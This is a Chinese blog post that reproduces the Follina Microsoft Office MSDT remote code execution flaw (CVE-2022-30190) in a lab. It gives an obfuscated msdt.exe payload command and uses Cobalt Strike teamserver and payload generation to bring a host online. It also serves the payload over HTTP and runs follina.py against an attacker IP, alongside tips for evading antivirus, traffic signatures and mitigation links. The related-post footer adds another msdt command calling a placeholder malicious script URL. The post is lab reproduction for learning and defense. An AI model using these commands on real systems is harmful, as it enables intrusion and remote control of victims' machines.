CVE-2022-30190 MSDT远程代码执行漏洞复现

已于 2022-09-29 17:39:07 修改
阅读量1k 收藏 12
点赞数 1
分类专栏: 漏洞复现【Free】 文章标签: 安全 web安全 java
于 2022-09-29 17:19:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44281295/article/details/127110259
版权

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

0x06 漏洞复现:

是否存在利用点:

CMD执行:

生成docx文件利用:

0x07 CS上线:

启动CS服务端:

CS客户端连接:

设置监听:

生成攻击exe:

宿主机启动8080服务:

利用POC

修改POC:

启动POC

文件放到Windows 10虚拟机

宿主机日志:

CS客户端上线:

0x08 流量分析:

MSDT流量:

0x09 修复建议:

0x01 声明:

        仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

        Microsoft Office 是由 Microsoft (微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint 等。

0x03 漏洞概述:

        Microsoft Office 存在远程代码执行漏洞,攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell 代码。另外,该漏洞在宏被禁用的情况下,仍能通过 MSDT(Microsoft Support Diagnostics Tool)功能执行代码,当恶意文件保存为 RTF 格式时,甚至无需打开文件,通过资源管理器中的预览选项卡即可在目标机器上执行任意代码。

0x04 影响版本:

      Microsoft Office 2016、Microsoft Office 2021(其他版本有待确认)

0x05 环境搭建:

      Windows 10虚拟机(一定要把Windows Defender关闭)

参考这篇文章:

彻底关闭Windows Defender&Windows 更新_Evan Kang的博客-CSDN博客

      Windows 10 宿主机

      Kali 虚拟机

      POC1:

https://github.com/chvancooten/follina.py

https://download.csdn.net/download/qq_44281295/86727749?spm=1001.2014.3001.5501

      POC2:

https://github.com/JohnHammond/msdt-follina

https://download.csdn.net/download/qq_44281295/86727749?spm=1001.2014.3001.5501

0x06 漏洞复现:

是否存在利用点:

CMD执行:

​
msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

生成docx文件利用:

0x07 CS上线:

启动CS服务端:

chmod +x teamserver

./teamserver ip key(key为密钥,客户端连接时候使用)

CS客户端连接:

设置监听:

点击“Cobalt Strike”–“Listeners”—“Add”—输入“ Name” —添加“HTTP Hosts”—点击“Save”

生成攻击exe:

点击“Attacks”—“Packages”—“Windows Executable”—点击“…”—选择“test”—点击“Generate”—选择一个路径存放exe(注意加白,会被杀。)

宿主机启动8080服务:

主要目的是让被害主机从这个服务上下载CS生成的exe。

python -m http.server 8080

利用POC

POC地址:xxx

修改POC:

启动POC

python follina.py -i 192.168.18.130 -p 8000 -r 6000

 

文件放到Windows 10虚拟机

(注意加白,会被杀软干掉。)

宿主机日志:

宿主机8080会收到一条下载成功的日志

CS客户端上线:

0x08 流量分析:

(请求CS生成exe应该在VPS上的,测试环境中在攻击者这边生成比较方便)

MSDT流量:


在流量分析中,发现只会有几种请求头:

User-Agent: Microsoft Office Protocol Discovery

User-Agent: Microsoft Office Word 2014

Mozilla/4.0 (compatible; ms-office; MSOffice 16)

伴随着的请求方式有:

HEAD                请求路径为 “/index.html”

OPTIONS          请求路径为 “/”

0x09 修复建议:

        目前可参考官方文档禁用 MSDT URL 协议或通过 Microsoft Defender 检测和保护系统。

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

Evan Kang
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-4510:Binwalk 远程代码执行漏洞
07-03
本文将深入探讨一个与二进制分析工具相关的安全事件,即"CVE-2022-4510:Binwalk 远程代码执行漏洞"。Binwalk是一款广泛使用的开源工具,主要用于固件分析、逆向工程和提取嵌入式系统的固件图像。这个漏洞可能导致...
CVE-2022-30190(follina):Microsoft诊断工具(MSDT)远程代码执行漏洞复现(超级详细)
aihiglh的博客
06-15 3692
CVE-2022-30190复现与使用,由一位中学生独自编写(第一次写文章),干货较多,欢迎收藏和讨论交流
CVE-2022-30190分析以及复现和POC利用 //Microsoft Office MSDT 远程代码执行漏洞
热门推荐
Ba1_Ma0的博客
06-09 1万+
在微软官方的介绍里,是从 Word 等调用应用程序使用 URL 协议调用 MSDT 时存在远程执行代码漏洞。成功利用此漏洞的攻击者可以使用调用应用程序的权限运行任意代码。意思是恶意 Word 文档可以使用远程模板功能从远程服务器获取 HTML 文件,并且 HTML 代码可以使用 Microsoft 的 MS-MSDT URI 协议方案来加载其他代码执行 PowerShell 代码与其他的漏洞不同,要利用此漏洞,攻击者只需要用户打开恶意文档即可,保存为RTF文件后,用户只是预览恶意文件,不用单击或者双击恶意
漏洞复现】Microsoft Office MSDT 远程代码执行漏洞CVE-2022-30190
qq_17754023的博客
06-03 4763
0x01 Microsoft OfficeMicrosoft Office是由Microsoft(微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint等。0x02 漏洞简介该文档使用 Word 远程模板功能从远程网络服务器检索 HTML 文件,该服务器使用 ms-msdt MSProtocol URI 方案加载代码执行 PowerShell,禁用宏,仍能通过MSDT功能执行代码(恶意 Word 文档通常用于通过宏执行代码)。......
Microsoft Office MSDT代码执行漏洞CVE-2022-30190漏洞复现
网安君的博客
06-01 2706
漏洞首次发现在2022 年 5 月 27 日,由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件,通过 ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用 Windows 程序 msdt.exe,该程序用于运行各种 Windows 疑难解答程序包。此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用 ‘ms-msdt’ URI执行任意PowerShell代码。目前已知影
CVE-2022-30190:Microsoft office MSDT 代码执行漏洞
最新发布
zkaqlaoniao的博客
04-18 812
漏洞首次发现在2022 年 5 月 27 日,由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件,通过 ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用 Windows 程序 msdt.exe,该程序用于运行各种 Windows 疑难解答程序包。此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用ms-msdtURI执行任意PowerShell代码
Windows MSDT RCE(CVE-2022-30190)复现
Love&Share
06-07 1473
Windows MSDT RCE(CVE-2022-30190)复现
Windows支持诊断工具(MSDT)远程代码执行漏洞CVE-2022-30190学习及复现
加油~
08-17 4244
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability对应的cve编号为CVE-2022-30190,其能够在非管理员权限、禁用宏且在windows defender开启的情况下绕过防护,达到上线的效果。
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 5978
通过exp实现了对微软目前存在的office-word-2016的成功复现
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Evan Kang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值